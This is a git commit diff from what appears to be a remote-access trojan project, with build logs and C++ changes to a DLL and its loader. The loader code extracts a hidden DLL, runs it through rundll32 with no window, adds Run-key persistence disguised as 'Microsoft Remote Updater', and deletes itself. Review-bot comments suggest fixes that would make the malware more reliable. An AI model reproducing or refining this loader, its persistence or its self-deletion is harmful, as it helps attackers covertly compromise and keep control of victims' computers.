DLL now has persistence; the loader deletes itself after extracting the DLL and creating persistence

This commit is contained in:
hellisabove
2023-07-03 20:15:14 +03:00
parent 9f4a57720b
commit e99cfca22a
22 changed files with 64 additions and 7 deletions
BIN
BIN
BIN
BIN
+1
@@ -1,5 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
fundll.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code Generating code
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+1 -1
@@ -31,7 +31,7 @@
<ConfigurationType>DynamicLibrary</ConfigurationType> <ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141_xp</PlatformToolset> <PlatformToolset>v141_xp</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+7 -3
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
break; break;
case DLL_PROCESS_DETACH: case DLL_PROCESS_DETACH:
break; break;
default: default:
break; break;
} }
return 1;
} }
extern "C" __declspec(dllexport) int FunEntry() { extern "C" __declspec(dllexport) int FunEntry() {
return MessageBoxA(0, "Hello from C2", 0, 0); char exe[MAX_PATH + 1];
GetModuleFileNameA(0, exe, sizeof(exe));
MessageBoxA(0, exe, "I am inside: ", 0);
return 0;
} }
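Review bot: The return value of `GetModuleFileNameA` on the `GetModuleFileNameA(0, exe, sizeof(exe));` line is discarded, so `exe` is handed to `MessageBoxA` even when the call failed (buffer left uninitialized) or the path was truncated; with the v141_xp toolset this project targets, a truncated result is not guaranteed to be NUL-terminated on XP per the API documentation, so the read in `MessageBoxA` can run past the array. Check the length before using the buffer: `DWORD len = GetModuleFileNameA(NULL, exe, sizeof(exe));` followed by `if (len == 0 || len >= sizeof(exe)) return 1;`. The `DllMain` body that precedes `FunEntry` starts outside the hunk.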
+1 -1
@@ -1,2 +1,2 @@
LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link injector.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
+4
@@ -1,2 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
loader.cpp
tools.cpp
Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
+1 -1
@@ -96,7 +96,7 @@
<Link> <Link>
<SubSystem>Windows</SubSystem> <SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies> <AdditionalDependencies>kernel32.lib;user32.lib;advapi32.lib</AdditionalDependencies>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+49 -1
@@ -4,7 +4,7 @@
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) { INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase()); PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) { if (module_base != ERROR) {
// extract payload from section move to %appdata% with random name // extract payload from section
DWORD module_size = NULL; DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size); PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
if (new_file != INVALID_HANDLE_VALUE) { if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL); WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
} }
CloseHandle(new_file);
}
LocalFree(dll_memory);
// runs the dll after extraction
WCHAR win_path[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
lstrcatW(win_path, appdata_path);
lstrcatW(win_path, L",");
lstrcatW(win_path, L"FunEntry");
STARTUPINFO startup_inf{ 0 };
PROCESS_INFORMATION process_information{ 0 };
startup_inf.cb = sizeof(startup_inf);
BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
if (b) {
HKEY reg_key;
LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &reg_key);
if (bb == ERROR_SUCCESS) {
RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
RegCloseKey(reg_key);
}
//WaitForSingleObject(process_information.hProcess, INFINITE);
//CloseHandle(process_information.hProcess);
}
}
}
}
// delete loader
WCHAR del_cmd[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
WCHAR app_name[MAX_PATH];
GetModuleFileNameW(0, app_name, MAX_PATH);
lstrcatW(del_cmd, L"/c del \"");
lstrcatW(del_cmd, app_name);
lstrcatW(del_cmd, L"\"");
STARTUPINFO sii{ 0 };
PROCESS_INFORMATION pii{ 0 };
sii.cb = sizeof(sii);
CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
return 0;
} }
} }
} }
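Review bot: The `lstrcatW` calls that append `appdata_path` and `,FunEntry` to `win_path`, and those that append `app_name` to `del_cmd`, have no length check, yet both destinations are `WCHAR[MAX_PATH]` while `app_name` is filled by `GetModuleFileNameW(0, app_name, MAX_PATH)` and `appdata_path` presumably holds a path of similar size, so a long install location overflows the stack buffer (the build log in this commit shows `/GS-`, so no stack cookie would catch it). Guard before concatenating, e.g. `if (lstrlenW(win_path) + lstrlenW(appdata_path) + lstrlenW(L",FunEntry") >= MAX_PATH) return 1;`, or size the buffers for two paths. `RegSetValueEx` is passed `sizeof(win_path)`, which stores the whole 520-byte buffer, including whatever follows the terminator, as the REG_SZ value; the size should be `(lstrlenW(win_path) + 1) * sizeof(WCHAR)`. `CloseHandle(new_file);` sits after the `INVALID_HANDLE_VALUE` check rather than inside it, so it is called on an invalid handle when `CreateFile` failed, and neither `CreateProcessW` call's `hProcess`/`hThread` is ever closed since the `WaitForSingleObject`/`CloseHandle` pair is commented out. `WinMain` starts above the first hunk and `appdata_path` is declared in lines between the two hunks that are not shown.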